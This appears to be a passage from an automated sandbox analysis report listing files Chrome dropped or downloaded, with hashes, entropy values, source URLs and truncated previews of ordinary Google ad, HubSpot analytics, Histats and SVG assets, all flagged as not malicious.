                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):9706
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.974244330200313
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:sdfLzIYp/TqA9pWKOtmld+fBOApnSbGbZAsCQSu98xpZi2:sdffIeecIKameOsnSbeCsCu98xpM2
                                                                                                                                                                                                                                                                                                                                                                          MD5:373CEF3A03E2AAB544B1645A96E1557D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:789BB2E7E291CE40587D62BDB821934E0F7B736D
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A9DCEB91B28EDD0CE446F678E2117ECE68191D4C2E609B07F4910D2F93F58226
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:9DF97EEAC20A806BDDAAC955EA39554040D9B5A38A5C7432C4BC0347FFB4C8C14F1E923082D9B227D6421996AEE238B0A027038FBDC381EA3365616544B94388
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:...........m[.8.0.......+."..^mD.R..@y...Q.m".YIKq...5..8.t..=.9...C.i43..H..,y..Z.-.n,..5{I.....g....Z....if26..@...... _..Y..]..z/...Kk.W..I.....Y;.`PG.[k.J...G.%&"........mG.\..>.TZ;...K.|.d.X^v/.5K.Nj......$...{d.Y.....EY.K}0.._...f.e..!.....5..:...O.H..@p.#...{k..O...w.....:.lZ.U.@..3J./w.......1....[k...66-.,.U.vn.u...bg...uuyn.X#.&.....IW..k/jnVS.&.o...t].{Y.'{...&.........u..h2~...e...;..M.J.U...4.Sj.Y.G...=.......h.....\.....i..O..g~`.X.u.........*..>...........U.u.I._}:..xXr..7|....Q=.x.s P.....yG^08..#..'kg....U.......N..Z.<w..3.._..O..]r{.&..._...u.U.to"j.^....oA.4....g..g..2.f..Q&uW^.....D.z.....}.o}gm.V...Y.........._76......D.G....b..n.%z..k;.......?.$.D.....:[..:...a.....fk{[........}k....zv...........?.d>...Xcn...|....^i..k.............n.Y.G.8..9<>..f......a.<.......Ok.:...'K.f...c(8....%<....<........6.<....B..x...3..L.:..3...(...9.6..;....Z.>...j.........A..uz...8>.}..............@....O......H>A..`...p....d....4M..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3515)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):211246
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.433882832602869
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:BBnfymOe6JT4BlSRsJrNZNK9GeMDyW+UP:bFVBIvUP
                                                                                                                                                                                                                                                                                                                                                                          MD5:BE384F708BFBE4E22DD8704031E6136A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B4219E9718DA56A4C975A8D517929246290D2FE4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:ADACA75980F7679FC20F76DA5FF23AA94315E142B85949FDCF05796B2680BFDE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6AB58C1F3AB01FE7FA08A6DCB497645B7D4A87FF383E48EE86EA03995C42D0F2C790D59D5E632D86024D4D0B94BBFF52B86CB23E788350BF0EF0E9B292E35738
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},p=ca(this),.u=function(a,b){if(b)a:{var c=p;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.u("Symbol",function(a){if(a)return a;var b=function(f,g){this.sg=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.sg};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e)t
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3329
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.156625370653912
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:skeJejbLPMA/nLEaHOHOzw3UYHNIH9YkNNHyGHRHLHOzw3UYHNIH9YkNNHyGHOHy:gqL7ON3t6y+VyQhLN3t6y+VyQoCNCWB
                                                                                                                                                                                                                                                                                                                                                                          MD5:C652FEB45186E77E43CE8A82F424E4DB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:70FFCF48C7DA3850470633F717BA6D2ACCA0080A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A71B80BE2C30F68FCC9BA168FD22E001FF7BCBC1C64D4A6A59C2DD362C636FA1
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:84AB8A9D2D95A9BC7283DD29B561CA46F49CBB4DCD6B02A61DFB82555CE068194133AA43C897D19751E45AE96A15ACD5E82C2AA27322D0CD4D4FD9FEB8973A3C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:<svg width="1440" height="1030" viewBox="0 0 1440 1030" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_1169_3143)">.<rect width="1440" height="1030" fill="#E4EFFF"/>.<g opacity="0.4" filter="url(#filter0_ii_1169_3143)">.<path d="M1207.04 1030L1551 0H-112L231.955 1030H1207.04Z" fill="url(#paint0_linear_1169_3143)" fill-opacity="0.2"/>.</g>.<g opacity="0.8" filter="url(#filter1_ii_1169_3143)">.<path d="M1105.61 1030L1378 0H61L333.393 1030H1105.61Z" fill="url(#paint1_linear_1169_3143)" fill-opacity="0.2"/>.</g>.</g>.<defs>.<filter id="filter0_ii_1169_3143" x="-182" y="0" width="1803" height="1034" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">.<feFlood flood-opacity="0" result="BackgroundImageFix"/>.<feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape"/>.<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>.<feOffset dx="70" dy="4"/>.<feGaussianBlur stdDe
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3329
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.156625370653912
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:skeJejbLPMA/nLEaHOHOzw3UYHNIH9YkNNHyGHRHLHOzw3UYHNIH9YkNNHyGHOHy:gqL7ON3t6y+VyQhLN3t6y+VyQoCNCWB
                                                                                                                                                                                                                                                                                                                                                                          MD5:C652FEB45186E77E43CE8A82F424E4DB
                                                                                                                                                                                                                                                                                                                                                                          SHA1:70FFCF48C7DA3850470633F717BA6D2ACCA0080A
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A71B80BE2C30F68FCC9BA168FD22E001FF7BCBC1C64D4A6A59C2DD362C636FA1
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:84AB8A9D2D95A9BC7283DD29B561CA46F49CBB4DCD6B02A61DFB82555CE068194133AA43C897D19751E45AE96A15ACD5E82C2AA27322D0CD4D4FD9FEB8973A3C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://get.managedmethods.com/hubfs/Background.svg
                                                                                                                                                                                                                                                                                                                                                                          Preview:<svg width="1440" height="1030" viewBox="0 0 1440 1030" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_1169_3143)">.<rect width="1440" height="1030" fill="#E4EFFF"/>.<g opacity="0.4" filter="url(#filter0_ii_1169_3143)">.<path d="M1207.04 1030L1551 0H-112L231.955 1030H1207.04Z" fill="url(#paint0_linear_1169_3143)" fill-opacity="0.2"/>.</g>.<g opacity="0.8" filter="url(#filter1_ii_1169_3143)">.<path d="M1105.61 1030L1378 0H61L333.393 1030H1105.61Z" fill="url(#paint1_linear_1169_3143)" fill-opacity="0.2"/>.</g>.</g>.<defs>.<filter id="filter0_ii_1169_3143" x="-182" y="0" width="1803" height="1034" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">.<feFlood flood-opacity="0" result="BackgroundImageFix"/>.<feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape"/>.<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0" result="hardAlpha"/>.<feOffset dx="70" dy="4"/>.<feGaussianBlur stdDe
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1382)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):17945
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.330388445341784
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:AbnElW+CdYyqBFy9G/JtCHAOgRImVWsc5JZB:Ll3CdnqC9ct2A1ImVWsc5h
                                                                                                                                                                                                                                                                                                                                                                          MD5:3B071D5606CC1CF92AE307F5BDB4E540
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E191068CC90E5489130489A1CF173FE50BBA28B8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:FF3DE130872FE0FB5B770DFA2BC9F0DAF8AB320403A34A60D089436F08D24F99
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8A1287D7528B2B65D61D6E0A639F2CBE5658AFC3EDB5E2AF9494E8CC876AA6C8060A55D3BD4AA85A0B3B82733E64F7F7A6B4A5F2597FD99FD37136A83A6BBCAD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://tpc.googlesyndication.com/sodar/sodar2.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var n=ba(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},u={};function w(a,b,c){if(!c||a!=null){c=u[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,writable:!0,value:b}):b!==c&&(u[d]
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3389), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3389
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1514871349348885
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:Sudkpwer6dkpw99pcd9Ywmpk0rkpwUMm5rOkpwR/hIbphkkpwBBrYkpwXMm5I:J+en+eNcdBIaeh+eR5SpDeB7e8f
                                                                                                                                                                                                                                                                                                                                                                          MD5:2CF240E4E781BA03E14A191BBE5FBF6B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:492E7643FB8A069EB28463EAB2DF1EEC7984CDBA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F5DEE65819F5BEA056EFE6C9819E146E15648ED6770248D07FEDCFF4272CA394
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C30F41E7ABC7D3B2346743E2542F5FDDBA79DD63934FC4736D43B596C5FA24DB0B41BC881C9774D0A2FE10344BABE6E1FCC174A816BB9AD43E2E9D4ACD38A5D3
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://js.hs-scripts.com/6834707.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:!function(t,e,r){if(!document.getElementById(t)){var n=document.createElement("script");for(var a in n.src="https://js.hubspot.com/web-interactives-embed.js",n.type="text/javascript",n.id=t,r)r.hasOwnProperty(a)&&n.setAttribute(a,r[a]);var i=document.getElementsByTagName("script")[0];i.parentNode.insertBefore(n,i)}}("hubspot-web-interactives-loader",0,{"crossorigin":"anonymous","data-loader":"hs-scriptloader","data-hsjs-portal":6834707,"data-hsjs-env":"prod","data-hsjs-hublet":"na1"});!function(t,e,r){if(!document.getElementById(t)){var n=document.createElement("script");for(var a in n.src="https://js.usemessages.com/conversations-embed.js",n.type="text/javascript",n.id=t,r)r.hasOwnProperty(a)&&n.setAttribute(a,r[a]);var i=document.getElementsByTagName("script")[0];i.parentNode.insertBefore(n,i)}}("hubspot-messages-loader",0,{"data-loader":"hs-scriptloader","data-hsjs-portal":6834707,"data-hsjs-env":"prod","data-hsjs-hublet":"na1"});!function(e,t){if(!document.getElementById(e)){var c=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (64644)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):70003
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.298605266244113
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:q49kULTaEJy7VonZXYNtWu2scVDXYRClzlIgQXyjXlkaioEFWOqDw6usT5aXsdtg:iND2LlzlIgQX28XsYce
                                                                                                                                                                                                                                                                                                                                                                          MD5:0958B43F935C68FF2A5837C68EBB2D57
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5B48F6AFE82737172B6D407A6E3A410FE01142F2
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:32F7D263D9AC8CC57B2AFB5C2EFB2E9392D4C038DE65D26241398AEC2E78F93B
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:78B3ED374C649C179162FDF5FE9988FCDF97EBC9BF39738FD32C60F69CAD6F3C34E1FF6831922BC049D51250D815933803EA391838FEB32BA58AE6323B0F6040
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://js.hs-analytics.net/analytics/1728897000000/6834707.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:/** . * HubSpot Analytics Tracking Code Build Number 1.993. * Copyright 2024 HubSpot, Inc. http://www.hubspot.com. */.var _hsq = _hsq || [];._hsq.push(['setPortalId', 6834707]);._hsq.push(['trackPageView']);._hsq.push(['setLegacy', false]);._hsq.push(['addHashedCookieDomain', '233546881']);._hsq.push(['addHashedCookieDomain', '82022089']);._hsq.push(['addHashedCookieDomain', '224894981']);._hsq.push(['addHashedCookieDomain', '20629287']);._hsq.push(['addHashedCookieDomain', '251652889']);._hsq.push(['enableAutomaticLinker', true]);._hsq.push(['setLimitTrackingToCookieDomains', true]);._hsq.push(['embedHubSpotScript', 'https://js-na1.hs-scripts.com/6834707.js', 'hs-script-loader']);._hsq.push(['initEventVisualizerScript']);._hsq.push(['setTrackingDomain', 'track.hubspot.com']);./** _anon_wrapper_ **/ (function() {./*! For license information please see hsa-prod.js.LICENSE.txt */.(hstc=hstc||{}).JS_VERSION=1.1;hstc.ANALYTICS_HOST="track.hubspot.com";(hstc=hstc||{}).Math={uuid:function()
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3515)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):211246
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.433882832602869
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:BBnfymOe6JT4BlSRsJrNZNK9GeMDyW+UP:bFVBIvUP
                                                                                                                                                                                                                                                                                                                                                                          MD5:BE384F708BFBE4E22DD8704031E6136A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B4219E9718DA56A4C975A8D517929246290D2FE4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:ADACA75980F7679FC20F76DA5FF23AA94315E142B85949FDCF05796B2680BFDE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6AB58C1F3AB01FE7FA08A6DCB497645B7D4A87FF383E48EE86EA03995C42D0F2C790D59D5E632D86024D4D0B94BBFF52B86CB23E788350BF0EF0E9B292E35738
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pagead2.googlesyndication.com/pagead/managed/js/activeview/current/ufs_web_display.js
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},p=ca(this),.u=function(a,b){if(b)a:{var c=p;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.u("Symbol",function(a){if(a)return a;var b=function(f,g){this.sg=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.sg};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e)t
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [], baseline, precision 8, 1948x1010, components 3
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):135963
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.73717094462852
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:2yDjHCoJNDiaCxVhWgqhCa1zZumzYgoRcimX+6fz:2yDPrmvvsgqoa5gaYVO
                                                                                                                                                                                                                                                                                                                                                                          MD5:83DAA43E5CE8E7F6B5DB68873FF985BA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9174FD50DAB105951ADEE3E9C08E26E266318811
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C799B8B9864587FE93299B1A234C202B5A7121FF69B55C17983F6C28E5D3EC75
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:10DF2CF1D62FA942F0671379F90407E7B065874CC3675A098FB2B412EFB38587A5B4C1DD6DF0F770953DFCB6450096D68BDC9C51E6F5F66DF9B1511E240CEF08
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://tpc.googlesyndication.com/simgad/10203123189183456847/14763004658117789537
                                                                                                                                                                                                                                                                                                                                                                          Preview:......JFIF..............ExifMM.*.............................V...........^.(...........1.........f.i.........n....................Picasa............0220.................................... .....!........ASCII...Screenshot7419d9c2852a14870000000000000000...........................2...........:.(.....................B...........P.......H.......H..........JFIF.............C..............................................!........."$".$.......C.......................................................................X...."........................................9.........................!.1.AQ.."2aq.b.#B....R.3r....................................3........................!1AQ..aq..."..#2....Bbr..............?..;.....;9u.E.%.l.Pg|g.9 }H..R(.E...4...I.Y,..[w<.O.s.....}+......Y.t..4.2qF..!.K3[.........[.*.`)....SAi.5...%...p...,......20~n1C..*{G..F+..F.......eHV....-r.T.........>...z.R.{xmm.X.-&..I.\.0..............b.....EdsGzu.O[.$...f.X..3E..4a.....w\y..J...mC..M.e..%..t.2..*..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3048)
                                                                                                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):50630
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.567339578794989
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:FLszR7bx8BAwksq5iae81/6rCXP+OHGGnF6wcnbBm0XApzlE:FLst2548CpnFfA6a
                                                                                                                                                                                                                                                                                                                                                                          MD5:720B17007468ED45EEEB0189F26E988E
                                                                                                                                                                                                                                                                                                                                                                          SHA1:EAAA0BB51885CF01D4BDEB4DA347EA42A816C638
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E12F1AAD0C4D33C880FAF28FC0CF72A04A32F235DE77F905C2D4C469A4404C61
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:1D63E319632B6B4279AC3BA059DA6827F09621C5BAE4B8B07D4A61B82F090A3573E0132354ACF5E7F97EF5CC24611A7AC0EB08644E0FCCDD432189AADD691F03
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          URL:https://pagead2.googlesyndication.com/pagead/show_companion_ad.js?fcd=true
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var q,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object"); .},da=ca(this),t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in c))break a;c=c[f]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}}; .t("Symbol",function(a){if(a)return a;var b=function(e,g){this.la=e;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.la};a=Math.random()*1E9>>>0;var c="jscomp_symbol_"+a+"_",d=0,f=func
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (11440), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):11440
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.405413454337748
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:TixaOdP2DahLeKkda6nGvCvsojELj2n04UwXNAfLwUW1WuYx6jomrYZJp2XmIR2z:mxaOdWyLwaAWj2nvUwXNAfLwUWAuYx6e
                                                                                                                                                                                                                                                                                                                                                                          MD5:E959FBDD13DEF4B9A9D0A5FC9A7DE4D4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1E39712307E3673B40C0BDB8C7D3E86A3E8B60A0
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:2DEFE59E357A7D0683C8283AC42841DB404A0884CAE2EAECEBF4B676E559DEDE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:590B22282634411002C9467C6C0D20D27979F841BFFCF893E715A2B61301A873457A9CBE0A765A11592E7F5CB81FC50D5BD436BD5D47DC93BFB776515B02E2C9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:(function(){var n="undefined",t=function(t){return typeof t!==n},e="js15_as.js",r="",i=!1,o=!1,a=!1,s=!1,c="0.2.1",u=25,_="-",f="_HISTATS_SID",d="histats_custom_destDivProducer",p=function(n){_+="_"+n};p(c);var v=function(){i&&console.log.apply(this,arguments)},l=function(n,r){var i=n||{};try{var o=r.document,a=r.navigator,s=r.screen,c=r.Date,f=r.Math,d=function(){return o},p=function(){return d().getElementsByTagName("body")[0]||d().getElementsByTagName("head")[0]},l=function(n){return"function"==typeof n},h=function(n){return t(n)&&n instanceof Array},m=function(n){return t(n)&&!!d().getElementById(n)},y=function(n){var e=!1;if(t(n)){if("NaN"==parseInt(n))return!1;e=parseInt(n)>0}return e},g=function(n){return y(n)?parseInt(n):0},w=function(n){return"string"!=typeof n||n.length<1?n:n.replace(/^['"]?(.*)['"]$/,"$1")},T=t(window["_DEBUG_HISTATS_ASYNCR_DO_NOT_AUTOSTART"]),I=function(){return parseInt(1e4*f.random())+1},H=function(){return Math.floor(4e8*Math.random())-2e8},C=I(),E="hist
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (61243)
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):62767
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.430308718778823
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:z3eubbg0RqsMNflThgnO5AEC09hgjWSQlImb5xthOE8pQPJJ3J7rfrLEoXHNajn3:zuubbg0Rq9t5Xai0mb5xFhpS2lVr54R
                                                                                                                                                                                                                                                                                                                                                                          MD5:4D5B14E9F856D3011ADE8F5B5248C06A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CB7C7A96E1E14E615405080CC10924DE8C8A26B4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:04A0576E3BF89D20E7155DD8EEE5B2BEB2131A8C3417AC7BE11F06AA8ADF4757
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:98A285D10805E32E07BDEB5A68F9D7839A54D7AC835E24988B7960F393C1E9134B574B0E76FD1D351EB5A8C528C43C604C957B970BDE1B2BCDB36B07AD66E22E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
